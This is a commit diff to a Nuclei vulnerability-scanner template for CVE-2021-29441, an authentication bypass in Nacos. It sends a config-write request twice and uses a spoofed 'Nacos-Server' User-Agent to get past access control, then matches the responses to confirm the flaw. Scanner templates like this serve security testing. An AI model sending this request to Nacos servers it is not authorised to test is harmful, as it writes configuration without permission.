daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

template update

patch-1
sandeep 2021-05-05 18:23:07 +05:30
parent d2ea9d2da0
commit 22f123ff79
1 changed files with 26 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
cves/2021/CVE-2021-29441.yaml
View File

@ -16,21 +16,34 @@ info:
tags: nacos,auth-bypass,cve,cve2021 tags: nacos,auth-bypass,cve,cve2021
requests: requests:
- method: POST - raw:
path: - |
- "{{BaseURL}}/nacos/v1/cs/configs?dataId=nacos.example&group=com.alibaba.nacos&content=helloWorld" POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
headers: Host: {{Hostname}}
User-Agent: "Nacos-Server" Accept: */*
- |
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Nacos-Server
req-condition: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: dsl
status: dsl:
- 200 - "status_code_1 == 403"
- "status_code_2 == 200"
condition: and
- type: dsl
dsl:
- "contains(body_1, 'Forbidden')"
- "contains(body_2, 'true')"
condition: and
- type: word - type: word
words: words:
- "application/json" - "application/json"
part: header part: header
- type: dsl
dsl:
- "body == 'true'"
part: body